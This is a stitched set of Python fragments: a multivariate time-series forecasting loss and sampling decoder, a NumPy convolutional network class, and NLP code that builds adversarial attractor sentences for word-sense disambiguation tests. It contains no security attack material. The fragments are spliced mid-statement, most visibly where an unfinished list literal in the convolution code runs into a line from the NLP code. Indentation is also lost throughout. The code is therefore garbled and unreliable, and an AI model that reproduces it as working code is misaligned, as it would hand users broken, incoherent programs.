seq_len=self.context_length + self.prediction_length,
)
# Assert CRPS_weight, likelihood_weight, and coherent_train_samples have harmonious values
assert self.CRPS_weight >= 0.0, 'CRPS weight must be non-negative'
assert self.likelihood_weight >= 0.0, 'Likelihood weight must be non-negative!'
assert self.likelihood_weight + self.CRPS_weight > 0.0, 'At least one of CRPS or likelihood weights must be non-zero'
        if self.CRPS_weight == 0.0 and self.coherent_train_samples:
            warnings.warn('No sampling being performed. coherent_train_samples flag is ignored')
        if not self.sample_LH == 0.0 and self.coherent_train_samples:
            warnings.warn('No sampling being performed. coherent_train_samples flag is ignored')
        if self.likelihood_weight == 0.0 and self.sample_LH:
            warnings.warn('likelihood_weight is 0 but sample likelihoods are still being calculated. '
                          'Set sample_LH=0 when likelihood_weight=0')
# Sample from multivariate Gaussian distribution if we are using CRPS or LH-sample loss
# dim: (num_samples, batch_size, seq_len, m)
if self.sample_LH or (self.CRPS_weight > 0.0):
raw_samples = distr.sample_rep(num_samples=self.num_samples_for_loss, dtype='float32')
# Only project during training if we have already sampled
if self.coherent_train_samples and epoch_frac > self.warmstart_epoch_frac:
coherent_samples = self.reconcile_samples(raw_samples)
assert_shape(coherent_samples, raw_samples.shape)
samples = coherent_samples
else:
samples = raw_samples
# Compute likelihoods (always do this step)
# we sum the last axis to have the same shape for all likelihoods
# (batch_size, seq_len, 1)
# calculates likelihood of NN prediction under the current learned distribution parameters
if self.sample_LH: # likelihoods on samples
# Compute mean and variance
mu = samples.mean(axis=0)
var = mx.nd.square(samples - samples.mean(axis=0)).mean(axis=0)
likelihoods = -LowrankMultivariateGaussian(
dim=samples.shape[-1], rank=0, mu=mu, D=var
).log_prob(target).expand_dims(axis=-1)
else: # likelihoods on network params
likelihoods = -distr.log_prob(target).expand_dims(axis=-1)
assert_shape(likelihoods, (-1, seq_len, 1))
# Pick loss function approach. This avoids sampling if we are only training with likelihoods on params
if self.CRPS_weight > 0.0: # and epoch_frac > self.warmstart_epoch_frac:
loss_CRPS = distr.crps(samples, target)
loss_unmasked = self.CRPS_weight * loss_CRPS + self.likelihood_weight * likelihoods
else: # CRPS_weight = 0.0 (asserted non-negativity above)
loss_unmasked = likelihoods
# get mask values
past_observed_values = F.broadcast_minimum(
past_observed_values, 1 - past_is_pad.expand_dims(axis=-1)
)
# (batch_size, subseq_length, target_dim)
observed_values = F.concat(
past_observed_values.slice_axis(
axis=1, begin=-self.context_length, end=None
),
future_observed_values,
dim=1,
)
# mask the loss at one time step if one or more observations is missing
# in the target dimensions (batch_size, subseq_length, 1)
loss_weights = observed_values.min(axis=-1, keepdims=True)
assert_shape(loss_weights, (-1, seq_len, 1)) #-1 is batch axis size
loss = weighted_average(
F=F, x=loss_unmasked, weights=loss_weights, axis=1
)
assert_shape(loss, (-1, -1, 1))
self.distribution = distr
return (loss, likelihoods) + distr_args
def reconciliation_error(self, samples):
r"""
Computes the maximum relative reconciliation error among all the aggregated time series
.. math::
\max_i \frac{|y_i - s_i|} {|y_i|},
where :math:`i` refers to the aggregated time series index, :math:`y_i` is the (direct) forecast obtained for
the :math:`i^{th}` time series and :math:`s_i` is its aggregated forecast obtained by summing the corresponding
bottom-level forecasts. If :math:`y_i` is zero, then the absolute difference, :math:`|s_i|`, is used instead.
        This can be computed as follows, given the constraint matrix A:
.. math::
\max \frac{|A \times samples|} {|samples[:r]|},
        where :math:`r` is the number of aggregated time series.
Parameters
----------
samples
Samples. Shape: `(*batch_shape, target_dim)`.
Returns
-------
Float
Reconciliation error
"""
num_agg_ts = self.A.shape[0]
forecasts_agg_ts = samples.slice_axis(
axis=-1, begin=0, end=num_agg_ts
).asnumpy()
abs_err = mx.nd.abs(mx.nd.dot(samples, self.A, transpose_b=True)).asnumpy()
rel_err = np.where(
forecasts_agg_ts == 0,
abs_err,
abs_err / np.abs(forecasts_agg_ts),
)
return np.max(rel_err)
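    # Worked toy example of the error above (illustrative, plain numpy):
    #
    #   import numpy as np
    #   A = np.array([[1., -1., -1.]])            # encodes "total - b1 - b2 = 0"
    #   samples = np.array([[10., 4., 5.]])       # aggregated forecast 10, bottom sum 9
    #   abs_err = np.abs(samples @ A.T)           # -> [[1.]]
    #   rel_err = abs_err / np.abs(samples[:, :1])
    #   rel_err.max()                             # -> 0.1, i.e. a 10% reconciliation error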
def sampling_decoder(
self,
F,
past_target_cdf: Tensor,
target_dimension_indicator: Tensor,
time_feat: Tensor,
scale: Tensor,
begin_states: List[Tensor],
) -> Tensor:
"""
Computes sample paths by unrolling the RNN starting with a initial
input and state.
Parameters
----------
past_target_cdf
Past marginal CDF transformed target values (batch_size,
history_length, target_dim)
target_dimension_indicator
Indices of the target dimension (batch_size, target_dim)
time_feat
Dynamic features of future time series (batch_size, history_length,
num_features)
scale
Mean scale for each time series (batch_size, 1, target_dim)
begin_states
List of initial states for the RNN layers (batch_size, num_cells)
Returns
--------
sample_paths : Tensor
A tensor containing sampled paths. Shape: (1, num_sample_paths,
prediction_length, target_dim).
"""
def repeat(tensor):
return tensor.repeat(repeats=self.num_parallel_samples, axis=0)
        # blow up the first dimension of each tensor to
        # batch_size * num_parallel_samples to increase parallelism
repeated_past_target_cdf = repeat(past_target_cdf)
repeated_time_feat = repeat(time_feat)
repeated_scale = repeat(scale)
repeated_target_dimension_indicator = repeat(
target_dimension_indicator
)
        # slight difference between GPVAR and DeepVAR: in GPVAR, it's a list
repeated_states = self.make_states(begin_states)
future_samples = []
# for each future time-units we draw new samples for this time-unit
# and update the state
for k in range(self.prediction_length):
lags = self.get_lagged_subsequences(
F=F,
sequence=repeated_past_target_cdf,
sequence_length=self.history_length + k,
indices=self.shifted_lags,
subsequences_length=1,
)
rnn_outputs, repeated_states, lags_scaled, inputs = self.unroll(
F=F,
begin_state=repeated_states,
lags=lags,
scale=repeated_scale,
time_feat=repeated_time_feat.slice_axis(
axis=1, begin=k, end=k + 1
),
target_dimension_indicator=repeated_target_dimension_indicator,
unroll_length=1,
)
distr, distr_args = self.distr(
time_features=inputs,
rnn_outputs=rnn_outputs,
scale=repeated_scale,
target_dimension_indicator=repeated_target_dimension_indicator,
lags_scaled=lags_scaled,
seq_len=1,
)
# (num_parallel_samples*batch_size, 1, m)
# new_samples are not coherent (initially)
new_incoherent_samples = distr.sample()
# reconcile new_incoherent_samples if coherent_pred_samples=True, use new_incoherent_samples if False
if self.coherent_pred_samples:
new_coherent_samples = self.reconcile_samples(new_incoherent_samples)
assert_shape(new_coherent_samples, new_incoherent_samples.shape)
if self.compute_reconciliation_error:
recon_err = self.reconciliation_error(samples=new_coherent_samples)
# Copyright <NAME>. All Rights Reserved.
# https://github.com/abel-gr/AbelNN
import numpy as np
import copy as copy
import random
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from pylab import text
import math
class ConvNetAbel:
version = 1.2
def __init__(self, hidden = [1], nEpochs = 1, learningRate=0.1, manualWeights=[],
debugLevel=1, rangeRandomWeight=None, showLogs=False, softmax=False,
activationFunction='leakyrelu', verbose = False, use='classification',
batch_size=1, batch_gradient='average', batch_mult=1, dropout=0, pre_norm=False,
shuffle=True, iterationDrop=0, convFilters = [32, 64, 128], convStride=2,
convFilterSizes=3, learningRateConv=0.001, convEpochs=10, kernel_initializer='he_normal'):
self.hiddenL = copy.deepcopy(hidden)
self.hiddenL2 = copy.deepcopy(hidden)
self.learningRate = learningRate
self.numEpochs = nEpochs
self.costs = [] # Costs list to check performance
self.debugWeights = []
self.meanCostByEpoch = []
self.hiddenWeights = []
self.manualWeights = manualWeights
self.debugMode = debugLevel
self.rangeRandomWeight = rangeRandomWeight
self.showLogs = showLogs
self.softmax = softmax
self.n_layer0 = -1
self.activationFunction = activationFunction
self.verbose = verbose
self.use = use
self.batch_size = batch_size
self.batch_gradient = batch_gradient
self.batch_mult = batch_mult
self.dropout = dropout
self.pre_norm = pre_norm
self.shuffle = shuffle
self.iterationDrop = iterationDrop
self.XavierInitialization = '1'
self.lastLayerNeurons = -1
# ConvNet:
self.convFilters = convFilters
self.filtersValues = [None] * len(convFilters)
self.convStride = convStride
self.convFilterSizes = convFilterSizes
self.learningRateConv = learningRateConv
self.convEpochs = convEpochs
self.kernel_initializer = kernel_initializer
    # 2D convolution with a single kernel ('valid'-style output, optional stride)
def conv2(self, x, kernel, stride=1):
output = [] #np.zeros((kernel.shape), dtype=np.float32)
kernel_l = kernel.shape[0]
kernel_size = kernel.shape[0] * kernel.shape[1]
c = int(kernel_l / 2)
for i in range(c, x.shape[0] - c, stride):
o = []
for j in range(c, x.shape[1] - c, stride):
i0 = i - c
j0 = j - c
i1 = i + c + 1
j1 = j + c + 1
o.append(np.sum(x[i0:i1, j0:j1] * kernel))
output.append(o)
output = np.asarray(output)
return output
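    # Quick sanity check for conv2 (illustrative; relies on the numpy import at the
    # top of this file and the default constructor):
    #
    #   x = np.arange(25, dtype=np.float32).reshape(5, 5)
    #   k = np.ones((3, 3), dtype=np.float32)
    #   out = ConvNetAbel().conv2(x, k)   # out.shape == (3, 3); out[0, 0] == x[0:3, 0:3].sum()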
    # Convolution with multiple filters; supports 'same', 'valid' and 'full' padding modes
def conv_filters(self, x, filters, stride=1, relu=False, mode='same'):
lex = len(x.shape)
lef = len(filters.shape)
if lex > lef:
print('conv_filters: The input array cannot have more dimensions than the filter array.')
return 0
output = []
kernel_l = filters.shape[0]
kernel_size = filters.shape[0] * filters.shape[1]
if lef == 2:
num_filters = 1
else:
num_filters = filters.shape[-1]
c = int(kernel_l / 2)
dim3 = False
evenShapeKernel = (kernel_l % 2 == 0)
if lex == 2:
dim2 = True
p0 = x.shape[0]
p1 = x.shape[1]
else:
            # the x parameter is the output of a previous call to this method
if lex == lef:
num_new_filters = int(num_filters / x.shape[-1])
if (num_new_filters % 2 != 0) and (num_filters % 2 == 0):
num_new_filters = num_new_filters - 1
if (num_new_filters == 0):
num_new_filters = 1
else: # It is the first convolutional layer of a color image
num_new_filters = num_filters
dim3 = True
dim2 = False
p0 = x.shape[0]
p1 = x.shape[1]
if mode == 'full':
fs0 = int(filters.shape[0] / 2)
fs1 = int(filters.shape[1] / 2)
max0 = p0 + fs0
max1 = p1 + fs1
ini0 = -1 * fs0
ini1 = -1 * fs1
elif mode == 'same':
max0 = p0
max1 = p1
ini0 = 0
ini1 = 0
elif mode == 'valid':
fs0 = int(filters.shape[0] / 2)
fs1 = int(filters.shape[1] / 2)
max0 = p0 - fs0
max1 = p1 - fs1
ini0 = fs0
ini1 = fs1
else:
print('Mode must be same, valid or full')
return 0
if evenShapeKernel and mode == 'valid':
max0 = max0 + 1
max1 = max1 + 1
for i in range(ini0, max0, stride):
o = []
for j in range(ini1, max1, stride):
i0 = i - c
j0 = j - c
i1 = i + c + 1
j1 = j + c + 1
if evenShapeKernel:
i0 = i0 + 1
j0 = j0 + 1
zero_padding_top = 0
zero_padding_bottom = 0
zero_padding_left = 0
zero_padding_right = 0
if i0 < 0:
zero_padding_top = abs(i0)
i0 = 0
if j0 < 0:
zero_padding_left = abs(j0)
j0 = 0
if i1 > p0:
zero_padding_bottom = i1 - p0
i1 = p0
if j1 > p1:
zero_padding_right = j1 - p1
j1 = p1
if dim2:
m = x[i0:i1, j0:j1]
#print('mshape:', m.shape, kernel_size, zero_padding_top, zero_padding_left)
# Zero padding:
m = np.pad(m, ((zero_padding_top,zero_padding_bottom),(zero_padding_left,zero_padding_right)), 'constant')
if lef != 2:
m = np.expand_dims(m, axis=-1)
m = np.repeat(m, num_filters, axis=-1)
else:
xi = x[i0:i1, j0:j1, :]
# Zero padding:
xi = np.pad(xi, ((zero_padding_top,zero_padding_bottom),(zero_padding_left,zero_padding_right),(0,0)), 'constant')
if dim3:
xi = np.expand_dims(xi, axis=-1)
m = np.repeat(xi, num_new_filters, axis=-1)
#print('M,F\n', m[:,:,0], filters[:,:,0])
#print(m.shape, filters.shape)
m = m * filters
#print('m*f\n', m[:,:,0])
m = np.sum(m, axis=0)
m = np.sum(m, axis=0)
if dim3:
m = np.sum(m, axis=0)
o.append(m)
output.append(o)
output = np.asarray(output)
if relu:
output[output < 0] = 0
return output
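    # Shape intuition for conv_filters (illustrative): with stride 1 and mode='same'
    # an (H, W) input and a (k, k, F) filter bank give an (H, W, F) feature map,
    # while mode='valid' shrinks the spatial dims by 2 * (k // 2). For example:
    #
    #   x = np.random.rand(28, 28)
    #   filters = np.random.rand(3, 3, 8)
    #   out = ConvNetAbel().conv_filters(x, filters, mode='valid')   # out.shape == (26, 26, 8)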
def kernelInitializer(self, i, ksize, inSize, outSize):
if 'xavier' in self.kernel_initializer:
if self.kernel_initializer == 'xavier_normal':
if len(ksize) == 4:
self.filtersValues[i] = np.random.randn(ksize[0],ksize[1],ksize[2],ksize[3]) * math.sqrt(2.0 / (inSize + outSize))
else:
self.filtersValues[i] = np.random.randn(ksize[0],ksize[1],ksize[2]) * math.sqrt(2.0 / (inSize + outSize))
elif self.kernel_initializer == 'xavier_uniform':
highVal = math.sqrt(6.0 / (inSize + outSize))
lowVal = -1 * highVal
self.filtersValues[i] = np.random.uniform(low=lowVal, high=highVal, size=ksize)
else:
if self.kernel_initializer == 'he_normal':
if len(ksize) == 4:
self.filtersValues[i] = np.random.randn(ksize[0],ksize[1],ksize[2],ksize[3]) * math.sqrt(2.0 / inSize)
else:
self.filtersValues[i] = np.random.randn(ksize[0],ksize[1],ksize[2]) * math.sqrt(2.0 / inSize)
elif self.kernel_initializer == 'he_uniform':
highVal = math.sqrt(6.0 / inSize)
lowVal = -1 * highVal
self.filtersValues[i] = np.random.uniform(low=lowVal, high=highVal, size=ksize)
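    # The branches above follow the usual He / Xavier (Glorot) heuristics, stated
    # here for reference (general formulas, not specific to this repository):
    #   he_normal:      W ~ N(0, std = sqrt(2 / fan_in))
    #   he_uniform:     W ~ U(-sqrt(6 / fan_in), +sqrt(6 / fan_in))
    #   xavier_normal:  W ~ N(0, std = sqrt(2 / (fan_in + fan_out)))
    #   xavier_uniform: W ~ U(-sqrt(6 / (fan_in + fan_out)), +sqrt(6 / (fan_in + fan_out)))
    # where fan_in / fan_out correspond to the inSize / outSize arguments.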
def convLayersFeedForward(self, im):
self.convInputs = []
len_m = len(im.shape)
#print('len_m:', len_m)
for i, cl in enumerate(self.convFilters):
self.convInputs.append(im)
if (self.filtersValues[i] is None):
if (type(self.convFilterSizes) == list):
ks = self.convFilterSizes[i]
else:
ks = self.convFilterSizes
inSize = np.prod(im.shape)
if 'xavier' in self.kernel_initializer:
if self.batch_size == 1:
imshape = np.asarray([im.shape[0], im.shape[1]])
else:
imshape = np.asarray([im.shape[1], im.shape[2]])
extraShape = int((ks % 2) == 0)
ks2 = int(ks / 2) * 2
outSize = np.prod((imshape - ks2 + extraShape)) * cl
else:
outSize = 0
if i == 0 and len_m == 3:
if self.batch_size == 1:
self.kernelInitializer(i, (ks,ks,im.shape[2],cl), inSize, outSize)
else:
self.kernelInitializer(i, (ks,ks,cl), inSize, outSize)
else:
self.kernelInitializer(i, (ks,ks,cl), inSize, outSize)
k_filters = self.filtersValues[i]
if (type(self.convStride) == list):
stride_par = self.convStride[i]
else:
stride_par = self.convStride
#print('Convolutional layer', i, '\n')
#print('Layer input shape:', im.shape)
#print('Layer filters array shape:', k_filters.shape)
# Start of convolutions
#im = self.conv_filters(im, k_filters, relu=True, stride=stride_par, mode='valid')
filtersValues_shape01 = np.asarray([k_filters.shape[0], k_filters.shape[1]])
filtersValues_shape_d2 = (filtersValues_shape01 / 2).astype(int)
extraShape = (filtersValues_shape01 % 2) == 0
eS0 = extraShape[0].astype(int)
eS1 = extraShape[1].astype(int)
posYf = eS0
posXf = eS1
filter_shape0 = k_filters.shape[0]
filter_shape1 = k_filters.shape[1]
if (len(k_filters.shape) >= 3):
num_filters = k_filters.shape[-1]
else:
num_filters = 1
if self.batch_size == 1:
xshape = np.asarray([im.shape[0], im.shape[1]])
else:
xshape = np.asarray([im.shape[1], im.shape[2]])
output_shape = xshape - filtersValues_shape_d2*2 + eS0
if ((len(im.shape) < len(k_filters.shape)) or (len(im.shape) == 2 and num_filters == 1)):
Xr = np.expand_dims(im, axis=-1)
Xr = np.repeat(Xr, num_filters, axis=-1)
else:
if (len(im.shape) == len(k_filters.shape)):
if self.batch_size == 1:
new_filters = int(im.shape[-1] / num_filters)
Xr = np.repeat(im, new_filters, axis=-1)
else:
Xr = np.expand_dims(im, axis=-1)
Xr = np.repeat(Xr, num_filters, axis=-1)
else:
Xr = im
if (len(Xr.shape) == 2):
npad = ((0,eS0), (0,eS1))
out_s = [output_shape[0], output_shape[1], 1]
elif (len(Xr.shape) == 3):
npad = ((0,eS0), (0,eS1), (0,0))
out_s = [output_shape[0], output_shape[1], num_filters]
elif (len(Xr.shape) == 4):
if self.batch_size == 1:
npad = ((0,eS0), (0,eS1), (0,0), (0,0))
out_s = [output_shape[0], output_shape[1], im.shape[2], num_filters]
else:
npad = ((0,0), (0,eS0), (0,eS1), (0,0))
                out_s = [im.shape[0], output_shape[0], output_shape[1],
- len(ws_tokens[ws_token_id].split()) + attractor_len
if rep_id == src_rep_loc:
updated_ambiguous_focus_term_ws_id = updated_rep_id
updated_ambiguous_term_ws_ids.append(updated_rep_id)
assert ws_tokens[spacy_to_ws_map[src_rep_loc][0]] == new_sent_tokens[updated_ambiguous_focus_term_ws_id], \
'Mismatch between token at ambiguous token position in the original sentence \'{}\' | \'{}\' ' \
'and generated sample \'{}\' | \'{}\''.format(src_sent.strip(), spacy_to_ws_map[src_rep_loc][0],
new_sent, updated_ambiguous_focus_term_ws_id)
assert updated_ambiguous_focus_term_ws_id in updated_ambiguous_term_ws_ids, \
'Term ID adjustment mismatch: Focus term ID: {}, ambiguous term IDs: {}' \
.format(updated_ambiguous_focus_term_ws_id, updated_ambiguous_term_ws_ids)
# Check if duplicate
if seen_samples.get(new_sent, None):
if seen_samples[new_sent] == (src_rep, updated_ambiguous_focus_term_ws_id, attractor_cluster_id):
continue
else:
seen_samples[new_sent] = (src_rep, updated_ambiguous_focus_term_ws_id, attractor_cluster_id)
adversarial_samples.append((new_sent,
updated_ambiguous_term_ws_ids,
updated_ambiguous_focus_term_ws_id,
attractor_ws_ids))
return adversarial_samples, seen_samples
def _replace_attractor_at_other_nouns(src_sent,
src_rep,
src_rep_loc,
attractor_term,
attractor_table,
seed_attractor_tokens,
adversarial_attractor_tokens,
general_modifier_tokens,
general_modifier_lemmas,
filter_bigrams,
window_size,
seen_samples,
attractor_cluster_id,
seed_parses,
disable_modifiers,
disable_ngrams):
""" Generates adversarial samples from a single seed sentence by replacing seed sentence tokens of the same POS
category as the attractor term with the attractor
(except for cases where the seed token modifies the ambiguous noun). """
def _is_non_positive(adjective):
""" Helper function for checking whether the specified adjective is a comparative or superlative """
# Count non-consecutive vowels
vowel_seq = list()
for ch in adjective:
if ch in VOWELS:
if len(vowel_seq) == 0:
vowel_seq.append(1)
else:
if vowel_seq[-1] != 1:
vowel_seq.append(1)
else:
vowel_seq.append(0)
if sum(vowel_seq) == 2:
return True
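        # Worked example of the heuristic above (assuming the standard VOWELS set):
        # 'bigger' -> non-consecutive vowel groups 'i' and 'e' -> sum == 2 -> True
        # (treated as comparative/superlative). Any other count falls through and
        # returns None, which is falsy at the call sites below.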
# Track samples to reduce duplicates
orig_seen_samples = seen_samples
# Process source sequence
spacy_sent_rep = seed_parses[src_sent][0]
spacy_tokens_lower = seed_parses[src_sent][1]
ws_tokens = seed_parses[src_sent][2]
spacy_to_ws_map = seed_parses[src_sent][4]
spacy_src_rep_ids = list()
spacy_rel_pos_ids = list()
adversarial_samples = list()
tokens_to_modify = list()
# Only replace adjectives if they modify a noun to reduce ungrammatical samples
for rep_id, rep in enumerate(spacy_sent_rep):
if rep.pos_ in ['NOUN'] and rep_id != src_rep_loc:
# Get rep lemma
rep_lemma = rep.lower_ if \
rep.lemma_ == '-PRON-' or rep.lemma_.isdigit() else rep.lemma_.lower()
rep_lemma = rep_lemma.strip(punctuation_plus_space)
# Check children for adjectives to replace
children = [child for child in rep.children]
for child in children:
if child.pos_ == 'ADJ' and child.text not in [tpl[0] for tpl in tokens_to_modify] \
and child.text.lower().strip(string.punctuation) not in QUANTIFIERS:
if child.text[0] == child.text[0].lower(): # Exclude 'proper noun adjectives', e.g. 'the Spanish'
tokens_to_modify.append((child.text, child.i, rep.text, rep_lemma))
# Check if attractor is permissible
for adj, adj_loc, noun_token, noun_lemma in tokens_to_modify:
if not disable_modifiers:
modifier_tokens = general_modifier_tokens.get(noun_lemma, None)
modifier_lemmas = general_modifier_lemmas.get(noun_lemma, None)
if modifier_tokens is None:
continue
else:
# Check whether the modified noun should be modified by the current attractor
keep_attractor_term = _score_attractor_with_modifiers(attractor_term,
attractor_table,
modifier_tokens,
modifier_lemmas,
seed_attractor_tokens,
adversarial_attractor_tokens)
if not keep_attractor_term:
continue
if adj_loc not in spacy_rel_pos_ids:
if not disable_ngrams:
# Avoid breaking-up collocations
term_to_replace = adj.lower().strip(punctuation_plus_space)
if filter_bigrams.get(term_to_replace, None) is not None and attractor_term not in INTENSIFIERS:
modified_term = noun_token.lower().strip(punctuation_plus_space)
bigram_count = filter_bigrams[term_to_replace].get(modified_term, 0)
if bigram_count >= 300:
continue
# Filter with bigrams
if filter_bigrams.get(attractor_term, None) is not None and attractor_term not in INTENSIFIERS:
modified_term = noun_token.lower().strip(punctuation_plus_space)
bigram_count = filter_bigrams[attractor_term].get(modified_term, 0.)
if bigram_count < 10:
if attractor_term.endswith('er'):
if filter_bigrams.get(attractor_term[:-2], None) is not None:
bigram_count = filter_bigrams[attractor_term[:-2]].get(modified_term, 0.)
if attractor_term.endswith('est'):
if filter_bigrams.get(attractor_term[:-3], None) is not None:
bigram_count = filter_bigrams[attractor_term[:-3]].get(modified_term, 0.)
if bigram_count < 10:
continue
# Check if insertion constraints are violated
if spacy_sent_rep[adj_loc].text.lower().strip(punctuation_plus_space) == attractor_term:
continue
        # A negative index would silently wrap to the end of the sentence, so guard position 0 explicitly
        left_context = spacy_sent_rep[adj_loc - 1] if adj_loc > 0 else None
try:
right_context = spacy_sent_rep[adj_loc + 1]
except IndexError:
right_context = None
if right_context is not None:
if right_context.pos_ not in ['NOUN', 'PROPN'] or \
(right_context.text.lower().strip(punctuation_plus_space) == attractor_term):
continue
if left_context is not None:
if left_context.pos_ in ['ADJ', 'PROPN'] or left_context.text == '@-@':
continue
if adj_loc > 1:
if spacy_sent_rep[adj_loc - 2].text in ['a', 'an', 'the']:
continue
if adj_loc < (len(spacy_sent_rep) - 2):
# Avoid modifying compounds (e.g. 'arm strength')
if spacy_sent_rep[adj_loc + 2].pos_ in ['NOUN', 'PROPN']:
continue
spacy_rel_pos_ids.append(adj_loc)
# Detect appropriate positions
for token_id, token in enumerate(spacy_tokens_lower):
if token in BLACKLIST:
continue
# Remove punctuation, separate compounds
sub_token_list = re.sub(r' +', ' ', token.translate(pct_stripper)).split()
sub_token_list = [sub_token.strip(punctuation_plus_space) for sub_token in sub_token_list]
for sub_token in sub_token_list:
if sub_token == src_rep:
spacy_src_rep_ids.append(token_id)
break # only one sub-token hit per token allowed
if len(spacy_src_rep_ids) == 0 or len(spacy_rel_pos_ids) == 0:
return adversarial_samples, orig_seen_samples
else:
attractor_len = len(attractor_term.split())
# Restrict set of modified terms to a window around each occurrence of the ambiguous term
if len(spacy_rel_pos_ids) > window_size > 0:
truncated_spacy_rel_pos_ids = list()
truncated_spacy_rel_pos_ids += sorted(spacy_rel_pos_ids, key=lambda x: abs(x - src_rep_loc))[:window_size]
spacy_rel_pos_ids = list(set(truncated_spacy_rel_pos_ids))
for token_id in spacy_rel_pos_ids:
# Convert to whitespace token position
ws_token_id = spacy_to_ws_map[token_id][0]
# Account for a / an
if ws_token_id > 0:
if ws_tokens[ws_token_id - 1] == 'a':
for vowel in list(VOWELS):
if attractor_term.startswith(vowel):
ws_tokens[ws_token_id - 1] = 'an'
if ws_tokens[ws_token_id - 1] == 'an':
for consonant in list(CONSONANTS):
if attractor_term.startswith(consonant):
ws_tokens[ws_token_id - 1] = 'a'
# Replace (most) adjectives with similar adjective forms
if attractor_term.endswith('er') and _is_non_positive(attractor_term):
if not (spacy_tokens_lower[token_id].endswith('er') and _is_non_positive(spacy_tokens_lower[token_id])):
continue
if attractor_term.endswith('est') and _is_non_positive(attractor_term):
if not (spacy_tokens_lower[token_id].endswith('est') and
_is_non_positive(spacy_tokens_lower[token_id])):
continue
if (not (attractor_term.endswith('er') or attractor_term.endswith('est'))) or \
(not _is_non_positive(attractor_term)):
if (spacy_tokens_lower[token_id].endswith('er') or spacy_tokens_lower[token_id].endswith('est')) and \
_is_non_positive(spacy_tokens_lower[token_id]):
continue
# Account for superlatives and ordinals
change_det = False
for suffix in ['est'] + ORDINAL_SUFFIXES:
if attractor_term.endswith(suffix):
change_det = True
break
if change_det:
if ws_token_id > 0:
if ws_tokens[ws_token_id - 1] in ['a', 'an']:
ws_tokens[ws_token_id - 1] = 'the'
# Generate samples by inserting the attractor in the neighborhood of each token of the appropriate POS
new_sent_tokens = ws_tokens[:ws_token_id] + [attractor_term] + ws_tokens[ws_token_id + 1:]
new_sent = ' '.join(new_sent_tokens)
attractor_ws_ids = [ws_token_id + attr_tok_id for attr_tok_id in range(len(attractor_term.split()))]
updated_ambiguous_term_ws_ids = list()
updated_ambiguous_focus_term_ws_id = spacy_to_ws_map[src_rep_loc][0]
for rep_id in spacy_src_rep_ids:
updated_rep_id = spacy_to_ws_map[rep_id][0]
if updated_rep_id >= ws_token_id:
updated_rep_id = updated_rep_id - len(ws_tokens[ws_token_id].split()) + attractor_len
if rep_id == src_rep_loc:
updated_ambiguous_focus_term_ws_id = updated_rep_id
updated_ambiguous_term_ws_ids.append(updated_rep_id)
assert ws_tokens[spacy_to_ws_map[src_rep_loc][0]] == new_sent_tokens[updated_ambiguous_focus_term_ws_id], \
'Mismatch between token at ambiguous token position in the original sentence \'{}\' | \'{}\' ' \
'and generated sample \'{}\' | \'{}\''.format(src_sent.strip(), spacy_to_ws_map[src_rep_loc][0],
new_sent, updated_ambiguous_focus_term_ws_id)
assert updated_ambiguous_focus_term_ws_id in updated_ambiguous_term_ws_ids, \
'Term ID adjustment mismatch: Focus term ID: {}, ambiguous term IDs: {}' \
.format(updated_ambiguous_focus_term_ws_id, updated_ambiguous_term_ws_ids)
# Check if duplicate
if seen_samples.get(new_sent, None):
if seen_samples[new_sent] == (src_rep, updated_ambiguous_focus_term_ws_id, attractor_cluster_id):
continue
else:
seen_samples[new_sent] = (src_rep, updated_ambiguous_focus_term_ws_id, attractor_cluster_id)
adversarial_samples.append((new_sent,
updated_ambiguous_term_ws_ids,
updated_ambiguous_focus_term_ws_id,
attractor_ws_ids))
return adversarial_samples, seen_samples
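# Illustrative call sketch for the function above (argument values are assumptions
# for illustration only; `cluster_id`, `parses`, and the lookup tables are whatever
# the caller has prepared -- see the parameter list in the signature):
#
#     samples, seen = _replace_attractor_at_other_nouns(
#         src_sent, src_rep, src_rep_loc, attractor_term, attractor_table,
#         seed_attractor_tokens, adversarial_attractor_tokens,
#         general_modifier_tokens, general_modifier_lemmas, filter_bigrams,
#         window_size=3, seen_samples={}, attractor_cluster_id=cluster_id,
#         seed_parses=parses, disable_modifiers=False, disable_ngrams=False)
#
# Each returned sample is (new_sent, ambiguous_term_ws_ids, focus_term_ws_id,
# attractor_ws_ids), mirroring the function that precedes it.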
def _parse_seed(seed_sentence,
adversarial_cluster,
src_word_loc,
attractor,
seed_parses):
""" Helper function that parses the seed sentence and caches the results for greater efficiency """
# Process source sequence
if not seed_parses.get(seed_sentence, None):
spacy_sent_rep, spacy_tokens_lower, _, _, ws_tokens, ws_tokens_lower, _, spacy_to_ws_map = \
_process_strings(seed_sentence,
nlp,
get_lemmas=False,
get_pos=True,
remove_stopwords=False,
replace_stopwords=False,
get_maps=True)
sentence_modifiers = list()
src_term_rep = spacy_sent_rep[src_word_loc]
src_term_lemma = src_term_rep.lower_ if \
src_term_rep.lemma_ == '-PRON-' or src_term_rep.lemma_.isdigit() else src_term_rep.lemma_.lower()
src_term_lemma = src_term_lemma.strip(punctuation_plus_space)
# Identify modifiers
children = [child for child in src_term_rep.children]
for child in children:
# Obtain lemmas
child_lemma = \
child.lower_ if child.lemma_ == '-PRON-' or child.lemma_.isdigit() else child.lemma_.lower()
child_lemma = child_lemma.strip(punctuation_plus_space)
# Filter by pos
if child.pos_ in MODIFIERS_POS_SET and child_lemma != src_term_lemma \
and child.text not in CONTRACTIONS and len(child_lemma) > 1:
sentence_modifiers.append(child_lemma)
# Evaluate head
head = src_term_rep.head
head_lemma = head.lower_ if head.lemma_ == '-PRON-' or head.lemma_.isdigit() else head.lemma_.lower()
head_lemma = head_lemma.strip(punctuation_plus_space)
# Filter by pos
if head.pos_ in MODIFIERS_POS_SET and head_lemma != src_term_lemma \
and head.text not in CONTRACTIONS and len(head_lemma) > 1:
sentence_modifiers.append(head_lemma)
seed_parses[seed_sentence] = \
(spacy_sent_rep, spacy_tokens_lower, ws_tokens, ws_tokens_lower, spacy_to_ws_map, sentence_modifiers,
(src_word_loc, adversarial_cluster, attractor))
return seed_parses
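# Cache layout (as written above): seed_parses[seed_sentence] is the 7-tuple
# (spacy_sent_rep, spacy_tokens_lower, ws_tokens, ws_tokens_lower, spacy_to_ws_map,
# sentence_modifiers, (src_word_loc, adversarial_cluster, attractor)), so indices
# [0]-[4] match the lookups performed in the sample-generation functions above.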
def _score_attractor_with_modifiers(attractor,
attractor_table,
modifier_tokens,
modifier_lemmas,
seed_attractor_tokens,
adversarial_attractor_tokens,
metric='[SORTED ATTRACTORS BY FREQ]'):
""" Helper function that scores attractors according to their 'typicality' respective the relevant clusters """
# Look up attractor lemma
attractor_lemma = attractor_table['[CONTEXT TOKENS]'][attractor]['[LEMMA]']
